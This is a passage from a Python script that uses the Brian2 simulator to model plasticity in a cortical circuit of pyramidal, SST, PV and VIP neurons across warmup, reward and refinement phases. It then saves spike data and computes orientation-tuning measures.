feedforwardgap2 = Synapses(gapfiller[1:2],
PYR[100:200],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap2')
feedforwardgap2.connect(p=1)
feedforwardgap3 = Synapses(gapfiller[2:3],
PYR[200:300],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap3')
feedforwardgap3.connect(p=1)
feedforwardgap4 = Synapses(gapfiller[3:4],
PYR[300:400],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap4')
feedforwardgap4.connect(p=1)
feedforward_unspec = Synapses(FF,
PYR,
on_pre='g_ampa += w_FFPYR',
name='feedforward_unspec')
feedforward_unspec.connect(p=1)
feedforward_PV = Synapses(FF,
PV,
on_pre='g_ampa += w_FFPV',
name='feedforward_PV')
feedforward_PV.connect(p=1)
feedforward_i1 = Synapses(layer4[0:1],
SOM[0:30],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i1')
feedforward_i1.connect(p=1)
feedforward_i2 = Synapses(layer4[1:2],
SOM[30:60],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i2')
feedforward_i2.connect(p=1)
feedforward_i3 = Synapses(layer4[2:3],
SOM[60:90],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i3')
feedforward_i3.connect(p=1)
feedforward_i4 = Synapses(layer4[3:4],
SOM[90:120],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i4')
feedforward_i4.connect(p=1)
feedforward_gap1 = Synapses(gapfiller[0:1],
SOM[0:30],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi1')
feedforward_gap1.connect(p=1)
feedforward_gap2 = Synapses(gapfiller[1:2],
SOM[30:60],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi2')
feedforward_gap2.connect(p=1)
feedforward_gap3 = Synapses(gapfiller[2:3],
SOM[60:90],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi3')
feedforward_gap3.connect(p=1)
feedforward_gap4 = Synapses(gapfiller[3:4],
SOM[90:120],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi4')
feedforward_gap4.connect(p=1)
# Synaptic connections within L23
# Connections from PCs to SSTs:
on_pre_PCSOM = on_pre_antiHebb_IE
on_post_PCSOM = on_post_antiHebb_IE
PYR_SOM1 = Synapses(PYR[0:100],
SOM[0:30],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM1')
PYR_SOM1.connect(p=p.p_PYR_SOM)
PYR_SOM1.w = w_PYR_SOM
PYR_SOM1.gmax = w_PYR_SOM + relbound * nS
PYR_SOM2 = Synapses(PYR[100:200],
SOM[30:60],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM2')
PYR_SOM2.connect(p=p.p_PYR_SOM)
PYR_SOM2.w = w_PYR_SOM
PYR_SOM2.gmax = w_PYR_SOM + relbound * nS
PYR_SOM3 = Synapses(PYR[200:300],
SOM[60:90],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM3')
PYR_SOM3.connect(p=p.p_PYR_SOM)
PYR_SOM3.w = w_PYR_SOM
PYR_SOM3.gmax = w_PYR_SOM + relbound * nS
PYR_SOM4 = Synapses(PYR[300:400],
SOM[90:120],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM4')
PYR_SOM4.connect(p=p.p_PYR_SOM)
PYR_SOM4.w = w_PYR_SOM
PYR_SOM4.gmax = w_PYR_SOM + relbound * nS
# Inhibitory synapses
Synaptic_model_I = '''w : siemens
gmax_i : siemens
dApre_i/dt = -Apre_i / tau_istdp : siemens (event-driven)
dApost_i/dt = -Apost_i / tau_istdp : siemens (event-driven)
plastic : boolean (shared)'''
# STDP at inhibitory synapses
on_pre_STDP_I = '''g_gaba += w
Apre_i += dApre_i
w = clip(w + plastic*Apost_i, 0*nS, gmax_i)'''
on_post_STDP_I = '''Apost_i += dApost_i
w = clip(w + plastic*Apre_i, 0*nS, gmax_i)'''
# anti-Hebbian STDP at inhibitory synapses
on_pre_antiHebb_I = '''g_gaba += w
Apre_i += dApre_i
w = clip(w - plastic*Apost_i, 0*nS, gmax_i)'''
on_post_antiHebb_I = '''Apost_i += dApost_i
w = clip(w - plastic*Apre_i, 0*nS, gmax_i)'''
"""excitatory synapses"""
# plastic recurrent synapses
con_REC = Synapses(PYR,
PYR,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='recurrent')
con_REC.connect(p=p.p_PYR_PYR)
con_REC.gmax = p.gmax
con_REC.w = p.recurrent_weights
# SST to PV
con_SOM_PV = Synapses(SOM,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='som2pv')
con_SOM_PV.connect(p=p.p_SOM_PV)
con_SOM_PV.w = p.SOM2PV_weights
con_SOM_PV.gmax_i = p.gmax_SSTPV
# PYR to PV
con_PYR_PV = Synapses(PYR,
PV,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='PYR0_PV0')
con_PYR_PV.connect(p=p.p_PYR_PV)
con_PYR_PV.w = w_PYR_PV
con_PYR_PV.gmax = p.w_PYR_PV + relbound * nS
# PC to VIP
con_PYR_VIP = Synapses(PYR,
VIP,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='PYR0_VIP0')
con_PYR_VIP.connect(p=p.p_PYR_VIP)
con_PYR_VIP.w = w_PYR_VIP
con_PYR_VIP.gmax = p.w_PYR_VIP + relbound * nS
"""inhibitory synapses"""
# SST to PC
con_SOM_PYR = Synapses(SOM,
PYR,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='SOMPYR')
con_SOM_PYR.connect(p=p.p_SOM_PYR)
con_SOM_PYR.w = p.w_SOM_PYR
con_SOM_PYR.gmax_i = p.w_SOM_PYR + relbound * nS
# SST to VIP
con_SOM_VIP = Synapses(SOM,
VIP,
Synaptic_model_I,
on_pre='''g_gaba += w
Apre_i += dApre_i
w = clip(w + plastic*.1*Apost_i, 0*nS, gmax_i)''',
on_post='''Apost_i += dApost_i
w = clip(w + plastic*.1*Apre_i, 0*nS, gmax_i)''',
name='SOMVIP')
con_SOM_VIP.connect(p=p.p_SOM_VIP)
con_SOM_VIP.w = p.w_SOM_VIP
con_SOM_VIP.gmax_i = p.w_SOM_VIP + relbound * nS
#SST to SST
con_SOM_SOM = Synapses(SOM,
SOM,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='SOMSOM')
con_SOM_SOM.connect(p=p.p_SOM_SOM)
con_SOM_SOM.w = p.w_SOM_SOM
con_SOM_SOM.gmax_i = p.w_SOM_SOM + relbound * nS
# PV to PC
con_PV_PYR = Synapses(PV,
PYR,
Synaptic_model_I,
on_pre=on_pre_antiHebb_I,
on_post=on_post_antiHebb_I,
name='PVPYR')
con_PV_PYR.connect(p=p.p_PV_PYR)
con_PV_PYR.w = p.w_PV_PYR
con_PV_PYR.gmax_i = p.w_PV_PYR + relbound * nS
#PV to SST
con_PV_SOM = Synapses(PV,
SOM,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVSOM')
con_PV_SOM.connect(p=p.p_PV_SOM)
con_PV_SOM.w = p.w_PV_SOM
con_PV_SOM.gmax_i = p.w_PV_SOM + relbound * nS
#PV to VIP
con_PV_VIP = Synapses(PV,
VIP,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVVIP')
con_PV_VIP.connect(p=p.p_PV_VIP)
con_PV_VIP.w = p.w_PV_VIP
con_PV_VIP.gmax_i = p.w_PV_VIP + relbound * nS
#PV to PV
con_PV_PV = Synapses(PV,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVPV')
con_PV_PV.connect(p=p.p_PV_PV)
con_PV_PV.w = p.w_PV_PV
con_PV_PV.gmax_i = p.w_PV_PV + relbound * nS
# VIP to SST
on_pre_VIPSOM = on_pre_antiHebb_I
on_post_VIPSOM = on_post_antiHebb_I
con_VIP_SOM = Synapses(VIP,
SOM,
Synaptic_model_I,
on_pre=on_pre_VIPSOM,
on_post=on_post_VIPSOM,
name='VIPSOM')
con_VIP_SOM.connect(p=p.p_VIP_SOM)
con_VIP_SOM.w = p.w_VIP_SOM
con_VIP_SOM.gmax_i = p.w_VIP_SOM + relbound * nS
# VIP to PC
con_VIP_PYR = Synapses(VIP,
PYR,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPPYR')
con_VIP_PYR.connect(p=p.p_VIP_PYR)
con_VIP_PYR.w = p.w_VIP_PYR
con_VIP_PYR.gmax_i = p.w_VIP_PYR + relbound * nS
# VIP to PV
con_VIP_PV = Synapses(VIP,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPPV')
con_VIP_PV.connect(p=p.p_VIP_PV)
con_VIP_PV.w = p.w_VIP_PV
con_VIP_PV.gmax_i = p.w_VIP_PV + relbound * nS
# VIP to VIP
con_VIP_VIP = Synapses(VIP,
VIP,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPVIP')
con_VIP_VIP.connect(p=p.p_VIP_VIP)
con_VIP_VIP.w = p.w_VIP_VIP
con_VIP_VIP.gmax_i = p.w_VIP_VIP + relbound * nS
# gap junctions between PVs
PVPV_gap = Synapses(
PV,
PV,
'''w : siemens
Igap_post = w * (v_pre - v_post) : amp (summed)''',
on_pre='Ispikelet+=c_gap',
)
PVPV_gap.connect()
PVPV_gap.w = p.w_gap
# Top down input: reward for stimulus 0 (horizontal, 180 degrees)
TD = NeuronGroup(p.NTD,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
con_ff_td = Synapses(layer4[TUNED_ORI:TUNED_ORI + 1],
TD,
on_pre='g_ampa += 0.3*nS')
con_ff_td.connect(p=p.p_L4_TD)
# top down input goes onto VIP
con_topdown = Synapses(TD, VIP, on_pre='g_ampa += w_TDVIP')
con_topdown.connect(p=p.p_TD_VIP)
store('nonplasticwarmup', filename='checkpoints/test.pkl')
restore('afternoSSTPV', filename='checkpoints/test2.pkl')
Stimmonitor = SpikeMonitor(layer4, variables=['orientation'])
# monitor synaptic weights
monPYRPV = StateMonitor(con_PYR_PV, 'w', record=True, dt=1000 * ms)
monVIPSOM = StateMonitor(con_VIP_SOM, 'w', record=True, dt=1000 * ms)
monVIPPV = StateMonitor(con_VIP_PV, 'w', record=True, dt=1000 * ms)
monVIPPYR = StateMonitor(con_VIP_PYR, 'w', record=True, dt=1000 * ms)
monPVPYR = StateMonitor(con_PV_PYR, 'w', record=True, dt=1000 * ms)
monPVSOM = StateMonitor(con_PV_SOM, 'w', record=True, dt=1000 * ms)
monPVPV = StateMonitor(con_PV_PV, 'w', record=True, dt=1000 * ms)
monPVVIP = StateMonitor(con_PV_VIP, 'w', record=True, dt=1000 * ms)
monSOMVIP = StateMonitor(con_SOM_VIP, 'w', record=True, dt=1000 * ms)
monSOMPYR = StateMonitor(con_SOM_PYR, 'w', record=True, dt=1000 * ms)
monSOMSOM = StateMonitor(con_SOM_SOM, 'w', record=True, dt=1000 * ms)
monPYRSOM1 = StateMonitor(PYR_SOM1, 'w', record=True, dt=1000 * ms)
monPYRSOM2 = StateMonitor(PYR_SOM2, 'w', record=True, dt=1000 * ms)
monPYRSOM3 = StateMonitor(PYR_SOM3, 'w', record=True, dt=1000 * ms)
monPYRSOM4 = StateMonitor(PYR_SOM4, 'w', record=True, dt=1000 * ms)
monPYRVIP = StateMonitor(con_PYR_VIP, 'w', record=True, dt=1000 * ms)
monVIPVIP = StateMonitor(con_VIP_VIP, 'w', record=True, dt=1000 * ms)
# monitor excitatory connections
mona = StateMonitor(con_REC,
'w',
record=con_REC[0:100, 100:400],
dt=100 * ms) # pyr 0 to others
monb = StateMonitor(con_REC,
'w',
record=con_REC[100:400, 0:100],
dt=100 * ms) # other to pyr 0
monc = StateMonitor(con_REC,
'w',
record=con_REC[100:200, 200:400],
dt=100 * ms) # pyr 1 to others
mond = StateMonitor(
con_REC,
'w',
record=con_REC[
'(i>=200) and (i<300) and (((j>=100) and (j<200)) or (j>300))'],
dt=100 * ms) # pyr 2 to others
mone = StateMonitor(con_REC,
'w',
record=con_REC[300:400, 100:300],
dt=100 * ms) # pyr 3 to others
# monitor population rates
PYR1 = PopulationRateMonitor(PYR[0:100])
PYR2 = PopulationRateMonitor(PYR[100:200])
PYR3 = PopulationRateMonitor(PYR[200:300])
PYR4 = PopulationRateMonitor(PYR[300:400])
SOM1 = PopulationRateMonitor(SOM[0:30])
SOM2 = PopulationRateMonitor(SOM[30:60])
SOM3 = PopulationRateMonitor(SOM[60:90])
SOM4 = PopulationRateMonitor(SOM[90:120])
PVmon = PopulationRateMonitor(PV)
VIPmon = PopulationRateMonitor(VIP)
# monitor SST to PV connections
monSOMPV = StateMonitor(con_SOM_PV, 'w', record=True, dt=1000 * ms)
SOM0PV = StateMonitor(con_SOM_PV, 'w', record=con_SOM_PV[:30:10, ::40])
SOMotherPV = StateMonitor(con_SOM_PV,
'w',
record=con_SOM_PV[30::10, 1::40])
# monitor spikes
sm_PYR = SpikeMonitor(PYR)
sm_VIP = SpikeMonitor(VIP)
sm_SOM = SpikeMonitor(SOM)
sm_PV = SpikeMonitor(PV)
sm_TD = SpikeMonitor(TD)
sm_layer4 = SpikeMonitor(layer4)
sm_FF = SpikeMonitor(FF)
sm_gap = SpikeMonitor(gapfiller)
# run without plasticity
defaultclock.dt = p.timestep
con_ff_td.active = False
TD.active = False
con_REC.plastic = False
con_SOM_PV.plastic = False
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
conREC_start = np.copy(con_REC.w[:])
run(p.nonplasticwarmup_simtime, report='text')
store('nonplasticwarmup')
print('non-plastic warmup done')
# plastic warmup
restore('nonplasticwarmup')
con_ff_td.active = False
TD.active = False
con_REC.plastic = True
con_SOM_PV.plastic = True
if p.restplastic == True:
con_VIP_SOM.plastic = True
con_PYR_PV.plastic = True
con_PV_PYR.plastic = True
con_PYR_VIP.plastic = True
PYR_SOM1.plastic = True
PYR_SOM2.plastic = True
PYR_SOM3.plastic = True
PYR_SOM4.plastic = True
con_VIP_PV.plastic = True
con_VIP_VIP.plastic = True
con_VIP_PYR.plastic = True
con_SOM_PYR.plastic = True
con_SOM_VIP.plastic = True
con_SOM_SOM.plastic = True
con_PV_SOM.plastic = True
con_PV_VIP.plastic = True
con_PV_PV.plastic = True
else:
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
print('starting warmup')
run(p.warmup_simtime, report='text')
conREC_afterwarmup = np.copy(con_REC.w[:])
sstpv_w_afterwarmup = np.copy(con_SOM_PV.w[:])
store('afterwarmup')
print('warmup done')
# rewarded phase
restore('afterwarmup')
con_ff_td.active = True
TD.active = True
con_REC.plastic = True
con_SOM_PV.plastic = True
print('starting reward period')
run(p.reward_simtime, report='text')
impact_afterreward, impactmax_afterreward = calc_impact(con_REC.w)
print('calculated impacts')
conREC_afterreward = np.copy(con_REC.w[:])
print('copied con_Rec')
sstpv_w_afterreward = np.copy(con_SOM_PV.w[:])
print('copied sstpv')
store('afterreward')
print('rewarded phase done')
# refinement phase
restore('afterreward')
con_SOM_PV.plastic = True
con_ff_td.active = False
con_topdown.active = False
TD.active = False
print('starting refinement phase')
run(p.noreward_simtime, report='text')
store('afternoreward')
print('45s of refinement phase done')
# refinement phase, option to kill SST-PV structure
restore('afternoreward')
# For Suppl. Fig. kill inhibitory weight structure:
# con_SOM_PV.w_i = p.SOM2PV_weights
con_ff_td.active = False
TD.active = False
con_REC.plastic = True
con_SOM_PV.plastic = True
run(p.noSSTPV_simtime, report='text')
store('afternoSSTPV')
print('refinement phase done')
# final non-plastic phase to measure tuning
restore('afternoSSTPV')
con_ff_td.active = False
TD.active = False
con_REC.plastic = False
con_SOM_PV.plastic = False
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
run(p.after_simtime, report='text')
# get spiking information
PYR_spiketrains = sm_PYR.spike_trains()
SOM_spiketrains = sm_SOM.spike_trains()
VIP_spiketrains = sm_VIP.spike_trains()
PV_spiketrains = sm_PV.spike_trains()
stimuli_t = Stimmonitor.t
PYRi, PYRt = sm_PYR.it
SSTi, SSTt = sm_SOM.it
PVi, PVt = sm_PV.it
VIPi, VIPt = sm_VIP.it
gapi, gapt = sm_gap.it
'''
results = {
'SOM0PV': SOM0PV.w,
'SOMotherPV': SOMotherPV.w,
'weights_rec': con_REC.w[:],
'weights_rec_afterwarmup': conREC_afterwarmup,
'weights_rec_afterreward': conREC_afterreward,
'weights_rec_start': conREC_start,
'weights_rec_i': con_REC.i[:],
'weights_rec_j': con_REC.j[:],
'weights_sst_pv': con_SOM_PV.w[:],
'weights_sst_pv_afterreward': sstpv_w_afterreward,
'weights_sst_pv_afterwarmup': sstpv_w_afterwarmup,
't': PYR1.t[:],
'SOMPV_t': monSOMPV.t[:],
'SOMPV_w': monSOMPV.w[:],
'SOMPV_t': monSOMPV.t[:],
'SOMPV_w': monSOMPV.w[:],
'PYRPV_w': monPYRPV.w[:],
'PYRVIP_w': monPYRVIP.w[:],
'PVPYR_w': monPVPYR.w[:],
'PVPV_w': monPVPV.w[:],
'PVSOM_w': monPVSOM.w[:],
'PVVIP_w': monPVVIP.w[:],
'VIPSOM_w': monVIPSOM.w[:],
'VIPPYR_w': monVIPPYR.w[:],
'VIPPV_w': monVIPPV.w[:],
'VIPVIP_w': monVIPVIP.w[:],
'SOMVIP_w': monSOMVIP.w[:],
'SOMPYR_w': monSOMPYR.w[:],
'SOMSOM_w': monSOMSOM.w[:],
'PYRSOM1_w': monPYRSOM1.w[:],
'PYRSOM2_w': monPYRSOM2.w[:],
'PYRSOM3_w': monPYRSOM3.w[:],
'PYRSOM4_w': monPYRSOM4.w[:],
'PYR0toothers': mona.w,
'otherstoPYR0': monb.w,
'PYR1toothers': monc.w,
'PYR2toothers': mond.w,
'PYRi': PYRi[:],
'PYRt': PYRt[:],
'SSTi': SSTi[:],
'SSTt': SSTt[:],
'PVi': PVi[:],
'PVt': PVt[:],
'VIPi': VIPi[:],
'VIPt': VIPt[:],
'Pyr1rate': PYR1.smooth_rate(window='flat', width=0.5 * ms),
'Pyr2rate': PYR2.smooth_rate(window='flat', width=0.5 * ms),
'Pyr3rate': PYR3.smooth_rate(window='flat', width=0.5 * ms),
'Pyr4rate': PYR4.smooth_rate(window='flat', width=0.5 * ms),
'SOM1rate': SOM1.smooth_rate(window='flat', width=0.5 * ms),
'SOM2rate': SOM2.smooth_rate(window='flat', width=0.5 * ms),
'SOM3rate': SOM3.smooth_rate(window='flat', width=0.5 * ms),
'SOM4rate': SOM4.smooth_rate(window='flat', width=0.5 * ms),
'PVrate': PVmon.smooth_rate(window='flat', width=0.5 * ms),
}
'''
results = {
'PYR_spike_train': PYR_spiketrains,
'SOM_spike_train': SOM_spiketrains,
'VIP_spike_train': VIP_spiketrains
}
# create a temporary directory into which we will store all files
# it will be placed into the current directory but this can be changed
# this temporary directory will automatically be deleted as soon as the with statement ends
# lets create a filename for storing some data
results_file = RESULTS_DIR + f'/results_tuned{TUNED_ORI}_1.pkl'
print('Saving results to: ' + results_file)
if not os.path.exists(RESULTS_DIR):
os.mkdir(RESULTS_DIR)
with open(results_file, 'wb') as f:
pickle.dump(results, f)
# Data postprocessing
# calculate impact of pyr0 onto others in weight matrix
impact, impactmax = calc_impact(con_REC.w)
'''
PVrate_initial = get_firingrate(PV_spiketrains, 0 * second,
p.nonplasticwarmup_simtime)
PVrate_TD = get_firingrate(PV_spiketrains, total_warmup_simtime,
total_warmup_simtime + p.reward_simtime)
'''
no_stimuli = 4
# get tuning for all populations to first and last presentation of each stimulus in entire simulation:
'''
tuning_before, tuning_after = get_tuning(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t, no_stimuli)
firstSOM, lastSOM = get_tuning(SOM_spiketrains, Stimmonitor.orientation,
Stimmonitor.t, no_stimuli)
firstVIP, lastVIP = get_tuning(VIP_spiketrains, Stimmonitor.orientation,
Stimmonitor.t, no_stimuli)
firstPV, lastPV = get_tuning(PV_spiketrains, Stimmonitor.orientation,
Stimmonitor.t, no_stimuli)
'''
reward_endtime = total_warmup_simtime + p.reward_simtime #/p.timestep
# get times of all stimuli during particular phases of the simulation:
# in the very beginning (first), endofreward, startofnonreward, and at the very end (last)
first, endofreward, startofnonreward, last = get_particular_stimulus_times(
Stimmonitor.orientation, Stimmonitor.t, no_stimuli, reward_endtime,
reward_endtime)
tuning_rewardend = get_spike_response(PYR_spiketrains,
no_stimuli,
p.input_time,
last=endofreward)
tuning_after_rewardend = get_spike_response(PYR_spiketrains,
no_stimuli,
p.input_time,
first=startofnonreward)
# get tuning average over all stimulus presentations over a period of time
tuning_initial = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
tuning_afterwarmup = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
tuning_duringreward = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
tuning_afterreward = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
tuning_final = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
stimtuning_initial = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
stimtuning_final = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
stimPVtuning_initial = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
stimPVtuning_final = get_tuning_avgoverperiod(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
PVtuning_initial = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
PVtuning_afterwarmup = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
PVtuning_duringreward = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
PVtuning_afterreward = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
PVtuning_final = get_tuning_avgoverperiod(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
VIPtuning_initial = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
VIPtuning_afterwarmup = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
VIPtuning_duringreward = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
VIPtuning_afterreward = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
VIPtuning_final = get_tuning_avgoverperiod(VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
SOMtuning_initial = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
SOMtuning_afterwarmup = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
SOMtuning_duringreward = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
SOMtuning_afterreward = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
SOMtuning_final = get_tuning_avgoverperiod(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
PYRData_reward = get_spiketrains_foreachstim(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
PYRData = get_spiketrains_foreachstim(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
SSTData_reward = get_spiketrains_foreachstim(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
SSTData = get_spiketrains_foreachstim(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
PVData_reward = get_spiketrains_foreachstim(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
PVData = get_spiketrains_foreachstim(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
PYRData_afterreward = get_spiketrains_foreachstim(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
SSTData_afterreward = get_spiketrains_foreachstim(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
PVData_afterreward = get_spiketrains_foreachstim(
